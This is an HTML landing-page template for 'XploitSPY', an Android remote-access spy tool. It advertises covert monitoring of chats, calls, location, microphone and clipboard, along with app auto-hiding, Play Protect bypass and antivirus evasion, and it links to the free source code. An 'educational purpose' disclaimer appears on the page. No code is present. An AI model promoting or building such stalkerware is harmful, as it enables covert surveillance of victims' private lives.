
<!DOCTYPE html>
<html lang="en">

    <% include partials/head.ejs %>

<!-- <head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<title>XploitSPY</title>
	<meta content="XploitSPY is an Android Spy RAT app which can monitor all android devices. Monitor WhatsApp chats, Call recordings, GPS locations, Contacts, Call Logs, File Explorer & more without root. Also Spy Facebook, Instagram, Tinder & Gmail." name=description>
	<link href=favicon.png rel=icon>
	<link rel="stylesheet" href="css/bootstrap.css">
	<link rel="stylesheet" href="css/style.css">
	
	<script src="js/jquery-3.4.1.min.js"></script>
</head> -->
<body>
	<header id="s-header">
		<nav class="navbar navbar-expand-lg">
			<div class="container px-0">
				<a class="navbar-brand" href="/">
		    	<img src="/img/logo.png" alt="Logotype">
			  </a>
			  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
			    <span class="navbar-toggler-icon"></span>
			  </button>

			  <div class="collapse navbar-collapse" id="navbarSupportedContent">
			    <ul class="navbar-nav ml-auto">
			      <li class="nav-item">
			        <a class="nav-link" href="#s-services">Features</a>
			      </li>
			      <li class="nav-item">
			        <a class="nav-link" href="#s-pricing-anchor">Pricing</a>
			      </li>
			    </ul>
			  </div>
			</div>
		</nav>
		<div class="container">		
			<div id="main-text">
				<div class="row">
					<div class="col-xl-6 col-lg-8">
						<h1>DISCLAIMER</h1>
						<p>XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
						</br>XploitSPY is built for Educational Purpose. Use at your own Risk.</p>
						<div class="row button_wrap">
							<div class="col-6">
								<a href="/login" class="btn-custom">Login</a>
							</div>
							<!-- <div class="col-6">
								<a href="javascript:LoginFunc('register');" class="btn-custom-black">Register</a>
							</div> -->
						</div>				
					</div>
					<div class="img_wrap">
						<img src="/img/hacker.png" alt="">
					</div>
				</div>			
			</div>
		</div>	
		<a href="#s-services" class="scroll-down flowing-scroll"><img src="/img/scroll-down.png" alt="scroll down">Scroll Down</a>
	</header>
	<section id="s-services" class="section">
		<div class="container">
			<h2 class="h2">Features</h2>
			<div class="row">
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>View Call Logs</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>View/Send Messages</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>View Contacts</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Get Location of Device</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>File Explorer & Downloader</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Microphone Recording</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>View WiFi Networks</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Live Clipboad Logging</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>View Installed Apps</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Monitor Skype/Telegram</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>App auto-hide</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Dedicated UI</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Whatsapp Chats</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Instagram Chats</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Messenger Chats</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Tinder Chats</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Bypass PlayProtect</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Undetectable by AntiVirus</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Command Queing</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Inbuilt Apk Builder</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>Completely OpenSource</p>
					</div>
				</div>
				<div class="col-6 col-md-3">
					<div class="wrap-services">
						<p>And many more Features!</p>
					</div>
				</div>
			</div>
		</div>		
	</section>
	<section id="s-video">
		<div class="container" id="PCA">
			<div class="row justify-content-between align-items-center h-100">
				<div class="col-md-6">
					<p class="PCA-text">Made with &#10084;&#65039; by XploitWizer</p>
				</div>
				<div class="col-md-4">
					<a href="https://xploitwizer.com" class="PCA-button btn-custom">Official Website</a>
				</div>
			</div>
		</div>
	</section>
	<section id="s-pricing">
		<div class="anchor-block" id="s-pricing-anchor"></div>
		<div class="container">
			<h2 class="h2">pricing</h2>
			<div class="row">
				<div class="col-lg-3 col-md-6">
					<article class="pricing">
						<img src="/img/svg/Shape7.svg" class="pricing-img" alt="Basic">
						<p class="h4">Monthly</p>
						<p class="pricing-short-description">Basic Plan</p>
						<div class="open-list">Open list</div>
						<div class="pricing-list">
							<section class="pricing-block">
								<p class="pricing-block-title">All features!</p>
								<ul class="list-unstyled pricing-block-list">
								</ul>
							</section>
						</div>
						<p class="pricing-cost">Free</p>
						<a href="https://github.com/XploitWizer/XploitSPY" class="btn-custom pricing-btn">Get Started</a>
					</article>	
				</div>
				<div class="col-lg-3 col-md-6">
					<article class="pricing">
						<img src="/img/svg/Shape6.svg" class="pricing-img" alt="Medium">
						<p class="h4">3-month</p>
						<p class="pricing-short-description">Perfect Plan!</p>
						<div class="open-list">Open list</div>
						<div class="pricing-list">
							<section class="pricing-block">
								<p class="pricing-block-title">All features</p>
								<ul class="list-unstyled pricing-block-list">
								</ul>
							</section>
						</div>
						<p class="pricing-cost">Free</p>
						<a href="https://github.com/XploitWizer/XploitSPY" class="btn-custom pricing-btn">Get Started</a>
					</article>	
				</div>
				<div class="col-lg-3 col-md-6">
					<article class="pricing">
						<img src="/img/svg/Shape4.svg" class="pricing-img" alt="Medium">
						<p class="h4">6-month</p>
						<p class="pricing-short-description">For long term!</p>
						<div class="open-list">Open list</div>
						<div class="pricing-list">
							<section class="pricing-block">
								<p class="pricing-block-title">All faetures!</p>
								<ul class="list-unstyled pricing-block-list">
								</ul>
							</section>
						</div>
						<p class="pricing-cost">Free</p>
						<a href="https://github.com/XploitWizer/XploitSPY" class="btn-custom pricing-btn">Get Started</a>
					</article>	
				</div>
				<div class="col-lg-3 col-md-6">
					<article class="pricing">
						<img src="/img/svg/Shape4.svg" class="pricing-img" alt="Medium">
						<p class="h4">Source Code</p>
						<p class="pricing-short-description two-lines">For businesses and advanced needs of individual</p>
						<div class="open-list">Open list</div>
						<div class="pricing-list">
							<section class="pricing-block">
								<p class="pricing-block-title">Feel Free to Contribute</p>
								<ul class="list-unstyled pricing-block-list">
								</ul>
							</section>
						</div>
						<p class="pricing-cost">Free</p>
						<a href="https://github.com/XploitWizer/XploitSPY" class="btn-custom pricing-btn">Get Started</a>
					</article>	
				</div>
			</div>
		</div>
	</section>

	<footer id="s-footer">
		<a href="javascript:LoginFunc('download');" class="scroll-top"><img src="/img/svg/downloadmain.svg" alt="Download"></a>
	</footer>

<!-- <script src="js/bootstrap.bundle.min.js"></script>
	
	<script src="js/main.js"></script> -->
</body>
</html>
